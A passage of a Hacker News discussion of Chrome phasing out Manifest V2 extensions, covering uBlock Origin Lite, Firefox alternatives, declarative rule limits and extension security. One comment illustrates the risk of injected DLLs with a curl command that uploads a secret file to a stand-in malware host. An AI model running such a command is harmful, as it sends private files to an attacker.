[HN Gopher] "Begin disabling installed extensions still using Ma...
___________________________________________________________________
"Begin disabling installed extensions still using Manifest V2 in
Chrome stable"
Author : freedomben
Score : 486 points
Date : 2024-10-11 14:20 UTC (1 days ago)
(HTM) web link (developer.chrome.com)
(TXT) w3m dump (developer.chrome.com)
| Kelteseth wrote:
| https://www.mozilla.org/en-US/firefox/new/
| varun_ch wrote:
| Chrome to Firefox is a relatively easy switch, especially for
| those that don't depend on Google sync. The main sources of
| friction for me were the lack of a good profile switching UI
| (solved with a browser extension that mimics the Chrome menu),
| and weird security requirements for homemade extensions (IIRC
| if you want to have the extension persist after restarting
| Firefox, you need to sign the extension, which is a pain)
|
| For users switching from Arc, there is no good alternative, but
| Firefox with Sidebery and custom CSS comes close.
| elashri wrote:
| > For users switching from Arc, there is no good alternative,
| but Firefox with Sidebery and custom CSS comes close.
|
| I would suggest zen browser [1] for those people.
|
| [1] https://zen-browser.app
| MrAlex94 wrote:
| I'd like to pop in and say Waterfox also has a list of
| comparable features: https://www.reddit.com/r/waterfox/comm
| ents/1ff0kzz/comment/l...
| tapoxi wrote:
| Arc has a built-in adblocker, so it depends if you're tied
| specifically to uBlock Origin (non-lite) features.
|
| I'm not sure what other extensions would be broken in
| Manifest v3.
| beached_whale wrote:
| One feature that is missing, removed, from Firefox is
| PWA's/running sites as apps. This is super handy for low
| trust apps
| Bobaso wrote:
| same here, the one thing keeping me on chrome
| husam212 wrote:
| I've been using Floorp for a while to get proper vertical
| tabs.
| afranchuk wrote:
| Note that Firefox profile management is getting an overhaul
| right now, including an easy profile switching UI. I'm not
| sure when it will be landing in release, but it is being
| actively built!
| Lukas_Skywalker wrote:
| I don't know if this is what you meant, but as an alternative
| to profile switching, there are Multi Account Containers [1].
| It allows assigning a container to each tab, and the
| containers are isolated from each other. If you have an MS or
| Google account for both work and personal, you can open them
| at the same time in different tabs.
|
| [1] https://addons.mozilla.org/en-US/firefox/addon/multi-
| account...
| lyu07282 wrote:
| this is such a killer feature I don't understand why it
| even is an extension, every browser that isn't adversarial
| to the user should have that feature tbh
| throwaway48476 wrote:
| I've found it hard to teach people how to use but it is a
| killer feature.
| skrause wrote:
| I'm using using multiple profiles when I want to have a
| different set of extensions, bookmarks and browsing
| history. Multi Account Containers help with none of that.
| byteknight wrote:
| Firefox containers are amazing
| sbrother wrote:
| In the past I've had a lot of issues with Google properties
| not working properly on Firefox -- either outright broken or
| using crazy amounts of CPU on Firefox but not Chromium-based
| browsers. Does anyone know if this is still an issue? I'd
| love to try again before I'm forced to by uBO breaking.
| nalinidash wrote:
| Profile is already available in Firefox(before chrome
| implemented it). Details on how to use it:
| https://support.mozilla.org/en-US/kb/profile-manager-
| create-...
|
| Also in chrome, multiple profiles need multiple google
| account(If I understand the UI correctly)connected, but in
| Firefox no account is needed.
| wtallis wrote:
| > Also in chrome, multiple profiles need multiple google
| account(If I understand the UI correctly)connected, but in
| Firefox no account is needed.
|
| You can use Chrome with multiple profiles by disabling the
| "Allow Chrome sign-in" option so that none of your browser
| profiles are tied to a Google account. I don't know if that
| option can be toggled on a per-profile basis, because I
| happen to prefer it off for all of my browser profiles.
| grounder wrote:
| I don't know much about Arc. But Arc users could give Firefox
| "Nightly" a try to preview new features coming up. It has
| vertical tabs and you can "pin" a few tabs at the top.
| Nightly also has containers already built-in, so you can have
| multiple accounts open for the same site in different
| container tabs.
| starky wrote:
| I've tried to switch from Vivaldi to Floorp and there is some
| things that Firefox does that drive me absolutely nuts.
|
| The main one is the behaviour of pinned tabs. Pinning in
| Firefox turns it into an icon that is harder to hit and
| doesn't even protect it from closing. This makes them
| essentially useless, they should be moved to the front of the
| tab bar and be protected from closing.
|
| The second is that when you use vertical tabs the tab bar
| acts like a title bar instead of a separate entity. This
| means you can't double click to create a new tab, and trying
| to drag a tab often results in the entire window moving. I
| have to use Tree style tabs and disable the normal tab bar
| completely to prevent this.
|
| There are also things that I don't like such as how downloads
| are handled and I've has issues with my session tabs being
| saved properly.
| roca wrote:
| > they should be moved to the front of the tab bar and be
| protected from closing.
|
| Firefox pinned tabs are moved to the LHS of the tab bar,
| they have no close button and ctrl-W doesn't close them.
| How much more do you want them to be protected from
| closing?
|
| This is actually one thing where Firefox is clearly better
| than Chrome ... Chrome pinned tabs close with ctrl-W which
| is really easy to do accidentally.
| TwoNineA wrote:
| uBlock Origin + Multi Account Containers makes Firefox
| enjoyable to use.
| anovick wrote:
| Main reason I'm still using Chrome and can't switch to Firefox:
| https://connect.mozilla.org/t5/ideas/feature-suggestion-fire...
| undercut wrote:
| There is something wrong with your Firefox installation
| (maybe try a new profile with vanilla settings). I use search
| shortcuts all the time (w + spacebar for wikipedia) and it's
| exactly the same behavior in Firefox than Chrome/Edge.
| prettymuchnoone wrote:
| hm i'll post this in the thread over there later but i'm
| pretty sure ff has that?
|
| https://imgur.com/a/gXrsBq3
| foxandmouse wrote:
| I love Mozilla, but I'm concerned about its future. Since 80%
| of its income reportedly comes from the Google search deal, do
| they have a plan to replace it after the recent ruling? And can
| they maintain their current level of autonomy while doing so?
| cma wrote:
| The Android version of Firefox still doesn't have working
| keyboard shortcuts after 13 years or a way to delete
| individual history items to prevent broken auto complete. The
| money is going into lots of other things than the browser.
| SAI_Peregrinus wrote:
| I'm not sure keyboard shortcuts for a version designed to
| run on an OS for devices without keyboards will ever be a
| priority. You _can_ use a keyboard on an Android device,
| but the vast, vast majority of Android devices are phones
| that never get used with keyboards. I don 't expect there's
| much priority to adding that feature.
|
| I agree that a lot of money is going to things other than
| the browser though.
| cma wrote:
| Many people use tablets and foldables with keyboards
| EasyMark wrote:
| Killing adblocking in Chrome might be a boost they need to
| attract someone else to pay for being the landing search
| page. I doubt if anyone will pay as much as google though. Or
| probably even close.
| neoromantique wrote:
| On Mac OS: https://kagi.com/orion/
| codetrotter wrote:
| From the Orion FAQ:
|
| > Is Orion open-source?
|
| > We're working on it! We've begun with some of our components
| and intend to open more in the future.
|
| > Forking WebKit, porting hundreds of APIs and writing a
| browser app from scratch has been challenging for our small
| team. Properly maintaining an open-source project takes time
| and resources we're short on at the moment, so if you want to
| contribute at this time, please consider becoming active on
| orionfeedback.org.
| vinnymac wrote:
| I won't be touching this binary with a ten foot pole until
| every line of code is open.
|
| Many excellent alternatives already exist that are also open
| and free, I don't see a compelling argument to use this
| software on any device at the moment.
| freediver wrote:
| Curious why exactly and what is wrong with closed source
| paid for products? By that token nobody should be touching
| Safari or iOS/macOS for that matter?
| throwaway98346 wrote:
| > By that token nobody should be touching Safari or
| iOS/macOS for that matter?
|
| Ideally, yes.
| neoromantique wrote:
| Fair play, but by that logic you shouldn't touch Mac OS as
| well, so the whole thing is moot since Mac OS is the only
| OS that is supported by Orion.
| madeofpalk wrote:
| Isn't Webkit GPL? How is it not open source?
| codetrotter wrote:
| https://webkit.org/licensing-webkit/
|
| WebKit is part LGPL, and part BSD.
|
| So I think from purely a licensing point of view, they are
| probably not in violation. Provided that the way they are
| linking the LGPL-licensed code is compatible with the LGPL.
|
| But like the other commenter said, I too would not run any
| web browser that was not fully open source, like this Orion
| browser.
| madeofpalk wrote:
| If they are _forking_ Webkit, like they say, doesn 't
| that require they distribute the source to their fork?
| Even if they don't have to distribute the browser linking
| to it?
|
| Or do I not understand the obligations of LGPL?
| freedomben wrote:
| Just a general rule of thumb that has served me well: If
| it's GPL, Apple wouldn't be using it. Apple _hates_ the GPL
| as it is the antithesis of their operating model.
| frizlab wrote:
| Orion is amazing.
| Etheryte wrote:
| I love Kagi, but I wish they focused on their core product
| first. Search is a hard problem to nail down and there's no
| shortage of bugs in Kagi right now, their issue tracker is a
| solid testament to that. When they spread their attention and
| resources between multiple products, they run the risk of
| pulling a Mozilla and shooting themselves in the foot multiple
| times.
| daveidol wrote:
| Interesting! So it's basically like Safari but with actual good
| web extension support (safari's answer to extensions is
| terrible)
| faefox wrote:
| Switch to a different browser! The Chrome monopoly only exists
| because we collectively allow it to exist.
| andrewjf wrote:
| Same with all the other google ecosystem. Gmail, maps, android.
| All just mechanisms for data collection and ad networks.
| blakesterz wrote:
| Has anyone been using the v3 compatible version of uBlock Origin?
| Have you noticed much of a difference? From what I read there
| isn't supposed to be much of a difference?
| kccqzy wrote:
| I have been using the Firefox version of it for more than a
| year by now, basically as soon as it came out. I commented on
| HN that I was going to do it:
| https://news.ycombinator.com/item?id=37219071
|
| There's no difference whatsoever.
|
| And it's not surprising because on my iOS device I've been
| using similarly architected content blockers since 2015.
| There's no issue with declarative ad blocking.
|
| Of course this differs with the kind of sites you visit. So you
| need to try it on your own. I can believe that perhaps for some
| people this is a downgrade, but don't automatically assume
| uBlock Origin Lite won't work well for you.
| drivebycomment wrote:
| Anyone jumping up and down about MV3 while using Mac or iOS
| are hypocrites, since MV3 is essentially doing the same thing
| Safari did years ago, finally matching the security and the
| privacy in that regard. The reduction in adblocking is so
| miniscule in aggregate - since declarative approach will
| always cover all the major advertisers - that it's not even a
| meaningful "trade-off".
| SoftTalker wrote:
| I see boatloads of ads in Safari on iOS. To the point that
| web browsing on my phone is intolerable, so I don't do it.
| kccqzy wrote:
| This is such a data-free anecdote. Which websites are
| showing ads? Which ad blocker did you install on iOS?
| HDThoreaun wrote:
| Which adblocker are you using? I have adguard and dont
| get ads on most safari sites but its just static DNS
| blocking so first party ad servers like youtube dont get
| blocked.
| SoftTalker wrote:
| Why should I need an adblocker app from some third party
| to which I have to grant full control over my browser?
| Apple would be enormously popular if they included one by
| default. Perhaps as an option you could disable. I don't
| know why all browsers don't do this (well, I know why
| Chrome doesn't).
|
| Browsers are selected by users, they should have no
| obligation to show ads.
|
| Brave is the only one doing this right AFAIK.
|
| Almost all the problems with tracking and buying and
| selling user profiles would end if browsers just didn't
| show ads.
| yjftsjthsd-h wrote:
| > Anyone jumping up and down about MV3 while using Mac or
| iOS are hypocrites, since MV3 is essentially doing the same
| thing Safari did years ago,
|
| iOS I'll give you, but macOS _can_ in fact run ex. Firefox.
|
| > finally matching the security and the privacy in that
| regard.
|
| "Matching" inferior security+privacy is not a good thing.
| The only way this is an improvement if you think the
| blockers are malicious; otherwise a useful tool in the
| users interest has been made less powerful.
| drivebycomment wrote:
| One of the most common API malware extensions use is what
| MV3 blocks, and adblock extension is one of the common
| malware vectors:
|
| https://helpcenter.getadblock.com/hc/en-
| us/articles/97384768...
|
| https://www.wired.com/story/fake-chrome-extensions-
| malware/
|
| This has been never ending.
| yjftsjthsd-h wrote:
| Okay, if you absolutely must then make that specific API
| require extra audit approval from the extension store,
| but breaking it outright is throwing out the baby with
| the bathwater; in a world where the FBI outright
| recommends an adblocker because ads are such a strong
| malware vector ( https://techcrunch.com/2022/12/22/fbi-
| ad-blocker/ ), it's irresponsible to undermine uBo.
| kccqzy wrote:
| Nobody likes extra audit approvals. The platform doesn't
| want to spend resources doing the audit. The developers
| don't want to be audited.
|
| The Firefox version of uBlock Origin Lite was pulled due
| to unsatisfactory audit process:
| https://news.ycombinator.com/item?id=41707418
| Dylan16807 wrote:
| > The Firefox version of uBlock Origin Lite was pulled
| due to unsatisfactory audit process
|
| So make one that isn't incompetent? That's not really a
| counterargument to the general idea.
| kuhsaft wrote:
| > The only way this is an improvement if you think the
| blockers are malicious
|
| Extensions and in turn MV2 blockers can easily be
| malicious.
|
| https://usa.kaspersky.com/blog/dangerous-chrome-
| extensions-8...
|
| Look at how many in Kaspersky's list are advertised as ad
| blockers. The majority of users aren't tech savvy like
| HN.
| yjftsjthsd-h wrote:
| > Look at how many in Kaspersky's list are advertised as
| ad blockers
|
| By my count 5, 6 if we include "Autoskip for Youtube",
| out of 34. That might be an argument for dropping
| extensions, but I don't think it's an argument for
| breaking ad blockers.
| kuhsaft wrote:
| > That might be an argument for dropping extensions
|
| Those extensions used the same API that ad blockers used,
| but for malicious purposes.
|
| So, you would support removing that API? Well, that's
| what they did for MV3 and implemented an API just for ad
| blocking.
| yjftsjthsd-h wrote:
| > Those extensions used the same API that ad blockers
| used, but for malicious purposes.
|
| Sounds like an obvious chance to flag the extension for
| further review, and probably a warning on the user side.
|
| > So, you would support removing that API?
|
| Of course not; that's throwing out the baby with the bath
| water. This brings us back to the "further review" thing;
| there's plenty of precedent for a platform having API
| surface that only a smaller subset of apps/extensions are
| allowed to use, because the features it exposes are
| legitimately needed for some things but it could be
| abused so it gets flagged and you have to write a
| detailed explanation for why your thing really needs this
| permission and then the reviewers can look at it
| particularly closely.
|
| > Well, that's what they did for MV3 and implemented an
| API just for ad blocking.
|
| And then for bonus points they hobbled it so that it
| couldn't be used to make as good of ad blockers, which is
| why the whole thing is not okay.
| kuhsaft wrote:
| It's similar, but not the same. Safari lets you dynamically
| generate rules that are then compiled for privacy and
| efficiency. The limits were increased to 150000 rules per
| content blocker due to user demands [1]. And each extension
| can have multiple content blockers.
|
| MV3 has a measly 30000 static rule limit. These rules are
| included with the extension and cannot be updated
| dynamically. And a 5000 dynamic rules limit. [2]
|
| EDIT: Chrome now has a 300000 shared pool for static rules
| for extensions that go over their 30000 limit. And a 30000
| dynamic rule limit [3].
|
| [1] https://adguard.com/en/blog/adguard-for-
| safari-1-11.html
|
| [2] https://adguard.com/en/blog/adguard-mv3-beta.html
|
| [3] https://developer.chrome.com/docs/extensions/develop/co
| ncept...
| nolist_policy wrote:
| The limit is 330000 rules:
|
| "Based on input from the extension community, we also
| increased the number of rulesets for
| declarativeNetRequest, allowing extensions to bundle up
| to 330,000 static rules and dynamically add a further
| 30,000."
| https://blog.chromium.org/2024/05/manifest-v2-phase-out-
| begi....
| kuhsaft wrote:
| It looks like it's a shared quota now with a minimum per
| extension [1].
|
| Still sucks that the rules are static though. AdGuard
| devised a method to diff ruleset changes with the built
| in rules to generate dynamic rules between extension
| updates. So, I guess it works.
|
| [1] https://developer.chrome.com/docs/extensions/develop/
| concept...
| michaelt wrote:
| _> And it 's not surprising because on my iOS device I've
| been using similarly architected content blockers since 2015.
| There's no issue with declarative ad blocking._
|
| Really?
|
| Because I find adblockers on iOS are nowhere near as good -
| they let far more ads through, and they leave far more sites
| broken so I have to disable the ad blocker for the site to
| work.
| eek2121 wrote:
| That is the fault of the blockers themselves. The one I use
| (https://apps.apple.com/us/app/1blocker-ad-
| blocker/id13655310...) works extremely well and even uses a
| local VPN setup for app ad-filtering.
|
| Twitter and YouTube ads are blocked.
|
| The drawback? It isn't free.
| the_gipsy wrote:
| > There's no difference whatsoever.
|
| That's simply not true. Have you ever donde a side by side
| comparison, or are you just going by feeling?
| joshdavham wrote:
| I use Adblock Plus, and ad blocking still perfectly works. Not
| sure about uBlock origin though.
| tyingq wrote:
| Static list of uris versus live heuristics. So "much of a
| difference" depends a lot on what you browse. If your browsing
| is covered by the static list, yes...there's little difference.
|
| Also, keep in mind advertisers are not unaware of all this
| movement. You don't think they'll try new tactics once they
| know everyone using chrome is now hobbled to solely static
| lists? That cloaking (or other approaches) won't then become
| really popular?
| fpoling wrote:
| A lot of other ad blockers use static lists for years. The
| fact that they work tells that ad industry does not see the
| blockers as a problem that needs to be dealt with. It can
| also be that so far the increased cost of development of ads
| that are immune to simple static lists is not worth it.
| tyingq wrote:
| Right. Advertisers didn't bother with all these tactics
| because normal chrome users could download a plugin without
| any major hurdles to thwart it. Why drive people that
| wouldn't otherwise use an ad blocker to do so?
|
| That's going away now. Now mostly everyone is vulnerable
| with the only recourse being pretty technical stuff, not
| just downloading a very popular plugin.
|
| So advertisers will now be free to get more aggressive
| without much downside.
|
| Edit: I do get that this sounds like conspiracy theory. But
| it really matches the Google boiling frogs approach.
| Removing the blocking onBeforeRequest, as one of the very
| first things in the manifest v3 spec was not a coincidence.
| kuhsaft wrote:
| onBeforeRequest was removed because it is a massive
| spyware and malware vector.
|
| > I do get that this sounds like conspiracy theory.
|
| > ... was not a coincidence.
|
| Could it be that it was coincidence? Do you have a
| solution for reducing extension malware without removing
| onBeforeRequest?
| tyingq wrote:
| > onBeforeRequest was removed because it is a massive
| spyware and malware vector.
|
| Yet you can still inject js right into the page. You just
| can't stop a page that was going to load from loading.
| They could have taken away the onBeforeRequest redirect
| capability and left just the onBeforeRequest cancel
| capability.
|
| Not sure I've heard of any spyware/malware depending on
| just that cancel capability.
| kuhsaft wrote:
| That uses a different manifest permission.
|
| https://developer.chrome.com/blog/crx-scripting-
| api#breaking...
| tyingq wrote:
| That's remotely hosted code...also a problem, but you can
| inject code that's not remotely hosted.
| kuhsaft wrote:
| The point is that it's a different permission.
|
| https://news.ycombinator.com/item?id=41812416
|
| If you are really privacy conscientious, ad blocking
| extensions should be able to exist without any access to
| web requests now.
| tyingq wrote:
| I feel like we're losing the plot here. Removing the
| cancel capability of onBeforeRequest didn't improve
| security much. It did, though, hobble ad blockers to just
| dealing with static lists if they want to prevent an ad
| from downloading in the first place.
|
| Removing the onBeforeRequest redirect didn't add much
| security either, since you can just ask for permission B
| instead of permission A and just inject code. Though, ad
| blockers don't need that anyway.
| kuhsaft wrote:
| It's insane to think that an extension with the ability
| to snoop on all your requests is more privacy oriented
| than one that can't.
|
| It's insane to want extensions to snoop on all your
| requests in an attempt at more privacy.
| tyingq wrote:
| Well, I would allow it for one specific extension that I
| feel does more good than harm for the capability. Call me
| insane.
| Dylan16807 wrote:
| It only sounds insane because you're saying "want
| extensions to snoop" to describe "want extensions to run
| a function call locally".
|
| It is a permission that _could_ be used by a malicious
| extension to snoop, but that is far from the only use.
| Wanting the permission != wanting snooping.
| throwaway48476 wrote:
| I made a plugin for scraping using onBeforeRequest. It's
| very useful.
| fpoling wrote:
| Even if Google did want to reduce effectiveness of ad
| blockers, doing that via removal of blocking webRequest
| API is a double-edged sword. It may push users to
| alternate browsers with more effective ad-blocking.
|
| Besides, webRequest implementation in Chromium is a
| terrible collection of hacks on hacks. It is a good
| example how not to design or implement API. I will not be
| surprised if the removal of the API comes from a simple
| desire to remove that embarrassing code.
| vlovich123 wrote:
| I've noticed a huge number of websites have interstitials
| pop up asking you to remove your ad blocker. While some let
| you bypass it anyway some don't. Clearly the websites
| themselves seem to care.
| tapoxi wrote:
| I've been using Lite for the past few months, I've seen no real
| difference. I think if you're particular about rulesets or are
| heavily customizing uBlock you may want to consider switching
| browsers, but I'm happy enough that I'm remaining on Chrome.
| kuhsaft wrote:
| I've been using AdGuard. There are some limitations with MV3,
| but it's not noticeable [1]. AdGuard uses dynamic rules for
| updating rules between extension updates and for custom user
| rules. There's the option using their system level AdBlocker
| too.
|
| [1] https://adguard.com/en/blog/adguard-browser-extension-
| mv3-re...
| internet2000 wrote:
| Another happy user of uBlock Origin Lite on Chrome here. No
| difference. 1Blocker on Safari user since Apple came out with
| the declarative adblocking system there as well.
| Cthulhu_ wrote:
| I for one am just going to wait it out and see what the
| internet looks like nowadays without an adblocker, if it
| doesn't auto-update. It's been so long.
| chlorion wrote:
| I used the lite version while on chromium for some time. I
| noticed no difference in terms of blocking ads.
|
| The main thing I missed was the ability to block arbitrary
| elements with the zapper. I use this for more than just ads, so
| losing it is a real loss in functionality. Otherwise it worked
| fine.
| igornadj wrote:
| Yeah the zapper is indispensable. Being able to filter
| content on platforms by the words in post titles is one of
| the best ways to not be exposed to toxic content.
|
| Never leaving your subscriptions (never using the algorithm
| recommended feed) is not a solution because of second-hand
| toxicity, e.g. political posts in meme subreddits in an
| election year.
|
| If anyone knows of a solution that works in Manifest V3 I'd
| love to hear it!
| est wrote:
| Can't we avoid the Manifest bullshit altogether?
|
| I remember how IE plugins roles: just dll inject into the
| process.
| emestifs wrote:
| Inject dll's from the internet right into the browser. Yes,
| let's!
| yjftsjthsd-h wrote:
| I'm not convinced that this is a good idea, but I don't think
| that's the reason; don't all your dlls come from the
| internet?
| emestifs wrote:
| My comment was sarcasm.
|
| The difference here is are you downloading a random dll
| from a well known source or from http://free-vpn-fast-
| internet.dwnloadfree.ru/free-chrome-vpn...? My mom isn't
| going to know the difference and will click the big green
| DOWNLOAD NOW button blindly.
| yjftsjthsd-h wrote:
| But that's _not_ a difference, is it? Can 't Windows
| enforce that DLLs have to be signed just like extensions?
| tredre3 wrote:
| Injecting a DLL in the browser implies code running with
| the browser's permissions, which means the DLL will be
| able to access everything on your system. For example
| `system("curl https://malware.com -F@/etc/secret-file")`
| will be possible. Another example is that it could also
| see all your saved passwords.
|
| A javascript extension cannot do that. It is sandboxed
| and is bound to a permission system limiting what it can
| do on top of that.
|
| Signing a DLL only proves that the author is who he says
| he is. Not that his intentions are good. Same for browser
| extensions.
|
| So it's best to limit what the extension can do to begin
| with.
| est wrote:
| My heavily downvoted comment was also a sarcasm.
|
| So here's the dilemma:
|
| - People are afraid of plugins "in the wild". People need
| some kind of centralized, managed "extension store"
|
| - People complains about store policy like Manifest V3
|
| I don't think a single mechanism can please both crowds.
|
| And what's worse? Google doesn't actually care about the
| security of the the "store". Scam extensions are
| everywhere. The "audit process" are minimal,
| customer/developer service are essentially none, and
| Google only enforce rules that affect their ads business.
| est wrote:
| > don't all your dlls come from the internet?
|
| Either from the "wild" internet or manifest v3 intranet.
|
| Or can we do better? For example, a community can maintain
| an opensource "network control" DLL that allow users to
| enable/disable tamperscript-like firewall rules from uBlock
| or such.
| arp242 wrote:
| Why not avoid all this unnecessary DDL overhead and just load
| as a kernel module?
| betaby wrote:
| TempleOS https://en.wikipedia.org/wiki/TempleOS
| Scion9066 wrote:
| Chrome tries to block the majority of third-party software from
| injecting code into it:
|
| https://blog.chromium.org/2017/11/reducing-chrome-crashes-ca...
| est wrote:
| yeah modern browsers are pretty secure, it's business moat.
| emaro wrote:
| For people that have somehow missed the story, manifest v3
| removed support for certain powerful network apis, severly
| limiting ad-blockers capabilities. uBlock Origin will not work
| anymore without manifest v2 (there's a v3 compatible lite version
| of uBlock Origin).
| jokoon wrote:
| I saw there is a manifest v3 ublock lite.
|
| I don't understand why and how it would be less capable, and so
| far I have not read the details of how/why.
|
| So far, it's just rumors to me.
|
| I will keep using firefox anyway, but honestly I am still
| waiting for a clearer explanation.
| kristofferR wrote:
| You can't just call stuff you simply don't bother to look up
| "rumors".
|
| Read up here:
|
| https://github.com/uBlockOrigin/uBOL-home/wiki/Frequently-
| as...
| sjnonweb wrote:
| With manifest v2, the extension could dynamically intercept
| requests and block them based on a custom rule.
|
| With v3, extensions have to predefine the rules for blocking.
| Which is the limiting factor
| hypeatei wrote:
| That and certain features like the element zapper in uBO
| aren't available in Lite.
| sho wrote:
| > extensions have to predefine the rules for blockin
|
| And there's a limit of 5000 such rules.
| nolist_policy wrote:
| The limit is 330000 rules:
|
| "Based on input from the extension community, we also
| increased the number of rulesets for
| declarativeNetRequest, allowing extensions to bundle up
| to 330,000 static rules and dynamically add a further
| 30,000."
| https://blog.chromium.org/2024/05/manifest-v2-phase-out-
| begi....
| lyu07282 wrote:
| even if it was infinite that wasn't really the issue, you
| can't express the algorithms uBlock Origin is using as a
| static list
| EasyMark wrote:
| Given the size and complexity of modern ad malware I
| doubt if 330,000 rules is enough, so why limit it?
| byteknight wrote:
| So because you don't understand it, its rumors? A Simple
| google search would answer all of your questions in a literal
| sentence. It removes APIs used by ad blockers.
|
| https://gprivate.com/6dp1q
| btown wrote:
| It's worth noting that the maintenance of the "lite" version is
| at some nonzero risk of burnout for its developers, ironically
| in part due to Mozilla being unnecessarily hostile:
| https://github.com/uBlockOrigin/uBOL-home/issues/197#issueco...
| discussed at https://news.ycombinator.com/item?id=41707418 -
| and while there's no plan yet to discontinue the Chrome MV3
| compatible version, there are a million ways that this could go
| wrong.
|
| My only long-term hope for this space is that a nonzero segment
| of congressional representatives have had ad blockers installed
| by their aides, realize that their experience online takes a
| nosedive when MV2 is discontinued, and calls for hearings!
| Blocking isn't just about not seeing ads, it's about a user's
| freedom to set up their "user agent" to preserve their privacy
| online from sites that don't respect their wishes. That's a
| right that Google is using its market power to erode, and it's
| not something we should take sitting down.
|
| More on MV3 from a few years ago:
| https://www.eff.org/deeplinks/2021/12/chrome-users-beware-ma...
| Kbelicius wrote:
| > It's worth noting that the maintenance of the "lite"
| version is at some nonzero risk of burnout for its
| developers, ironically in part due to Mozilla being
| unnecessarily hostile:
|
| Why would you even use the lite version on firefox when the
| original works?
| bad_user wrote:
| Security and possibly performance, which is the selling
| point of MV3.
| chlorion wrote:
| Yup, the MV3 version requires zero permissions and in
| theory should be faster. These are real benefits that for
| some reason nobody will admit exist.
|
| Saying anything positive about MV3 or the lite extension
| seems to get you downvoted without explanation though,
| which is a nice example of how absurd this site is when
| it comes to anything related to Google.
|
| Sometimes I think downvoting should require leaving a
| comment and reason, because I can't see any reason to
| downvote this other than "google bad".
| tpm wrote:
| Reason: Removing user control from browsers is strictly
| bad.
| pyre wrote:
| Sounds like the real issue is "we are replacing X with Y"
| and there are use-cases for both X and Y to co-exist.
| chii wrote:
| and just conveniently, X has some features that the
| owning company doesn't like as it is antithesis to their
| business model. Therefore, by replacing X with Y, and
| touting some performance improvements (which is real, but
| marginal), they get to remove X with plausible
| deniability.
| mrkramer wrote:
| They should let them co-exist but probably they figured
| out it is just easier to kill V2 extensions all together.
| What a shame.
| knowitnone wrote:
| you get to downvote?
| MissTake wrote:
| When you get Karma of 501 or more...
| sys_64738 wrote:
| Which GOOG team are you on?
| mrkramer wrote:
| He is on Extensions team. lol
| Dylan16807 wrote:
| > nobody will admit exist.
|
| This is not true.
|
| People talk about the upside of the declarative API
| plenty, but adding one function doesn't mean removing
| another, and the conflation required to use that as a
| defense of google is what gets downvotes.
| eviks wrote:
| "in theory" is not a real benefit
| wruza wrote:
| Is uBOL as ad-removing and privacy protecting as uBO?
|
| We aren't talking just an extension here. If it didn't
| exist, that would make web browsing insufferable to many.
| It is a part of web browsing itself. Let me put it as
| clearly as it can be:
|
| ***
|
| uBO is a Holy Grail and gorhill is our Jesus Christ.
|
| ***
|
| If MV3 (and further development) tries to touch it in any
| inappropriate way, comments promoting it deserve 5x
| downvote mutiplier without the usual -4 limit.
| sebzim4500 wrote:
| I get the security benefits, but the performance benefits
| seem weak. Won't the benefits of not having to run as
| much js to do the filtering be cancelled out by having
| the run additional advertising code that isn't being
| blocked by the lobotomised adblockers?
| Nullabillity wrote:
| Lite doesn't require any permissions.
| skrause wrote:
| I'm doing all my banking in a separate Firefox profile
| where uBlock Origin Lite is the only installed extension.
| So there a zero extensions that have permission to access
| the pages or requests.
|
| Of course I'm still using the normal uBlock Origin in my
| main browsing profile.
| jeffbee wrote:
| The "original" UBO is basically the mother of all supply
| chain vulnerabilities and whenever the inevitable exploit
| happens, everyone who thought they were a connoisseur of
| privacy is going to get completely pwned. UBO Lite works
| without being a gigantic security vuln.
| Rebelgecko wrote:
| Some people may think what you're saying is outlandish,
| but it's worth remembering that this is pretty much what
| already happened to Ublock (which led to the forking of
| Ublock Origin and return of gorehill)
| 0cf8612b2e1e wrote:
| Not saying it cannot happen, but in Firefox, it is a
| "Recommended" extension which gets reviewed per release.
| A sophisticated attack could slip through, but a ham
| fisted takeover is unlikely.
| Jach wrote:
| It's also worth mentioning that Firefox doesn't force you
| to auto-update add-ons, but Chrome/Chromium do. (There
| was a hack workaround to keep Chromium from updating, but
| I forgot what it was or if it still works. It wasn't a
| trivial option in the browser itself like it should be.)
| isomorphic- wrote:
| I use a certain extension. An update turned the extension
| into payware, locking 90% of the features behind a
| paywall. So I refuse to update it and instead continue to
| use the revision that still has all the original
| features. I would be absolutely incensed and outraged if
| my browser insisted on forcing me to update this
| extension!
|
| Surely there are better ways for a developer to make
| money off of an existing extension without suddenly
| locking previously available functions behind a paywall.
| Perhaps instead paywall NEW features? Or ask for
| donations?
| sockaddr wrote:
| I think everywhere that you used "nonzero" you could have
| also not and it would have still made exactly the same point.
| btown wrote:
| Normally this kind of thing isn't said in good faith, but
| it's actually a way my writing can improve and I appreciate
| the feedback!
| ikekkdcjkfke wrote:
| Looks like FF got unlucky with a subcontractor that is
| "manually reviewing" extensions on the cheap
| justinclift wrote:
| > My only long-term hope for this space ...
|
| Some of the anti-monopoly investigations of Google might
| achieve this too.
|
| The removal of MV2 is extremely clearly Google abusing their
| dominant market position to line their pockets at the expense
| of their users.
|
| When this goes through, there will be another EU anti-
| monopoly investigation just for this.
| boredhedgehog wrote:
| I imagine the focus of the developers will very quickly shift
| to Lite once Chrome flips the switch and 95% of uBO's user
| base disappears overnight. It might not be what they want,
| but such events have their own dynamic.
| freedomben wrote:
| Notably, Firefox is _not_ removing v2 support (at least for now
| as of March 2024)
|
| > _Firefox, however, has no plans to deprecate MV2 and will
| continue to support MV2 extensions for the foreseeable future.
| And even if we re-evaluate this decision at some point down the
| road, we anticipate providing a notice of at least 12 months for
| developers to adjust accordingly and not feel rushed._ [1]
|
| [1]:
| https://blog.mozilla.org/addons/2024/03/13/manifest-v3-manif...
| simcop2387 wrote:
| Along with that, I'd hope they'll add needed support for proper
| adblocking even with v3 and beyond
| EasyMark wrote:
| To my knowledge the "big" chrome engine alternatives aren't
| either. I know that Vivaldi and Brave plan on keeping around v2
| as long as it is economically feasible
| echoangle wrote:
| This sounds like Android phone manufacturers making fun of
| apple for removing the headphone jack and then doing it
| themselves a year later. Are they seriously going to maintain
| V2 support for a relatively small percentage of Powerusers
| which probably are mostly already using Firefox anyways? The
| point of being economically infeasible is probably in a month
| or so.
| therein wrote:
| I think it comes down to how aggressive Chrome will be at
| changing the internal APIs that it uses. They could choose
| to make it a very expensive patch to maintain. But I think
| they would have to go out of their way to do that.
| mgiampapa wrote:
| Firefox (and uBlock and BPC etc) works great on Andriod,
| but you have to disable Chrome to get Google apps to play
| nice.
| zamalek wrote:
| Though it is less of an issue for those two, given that they
| have built-in adblocking. Still a laudable effort.
| sunshowers wrote:
| At least when I last tested, Vivaldi on Android's
| adblocking is pretty far behind uBlock Origin -- it doesn't
| get nearly as many anti-adblock interstitials as it should.
| creesch wrote:
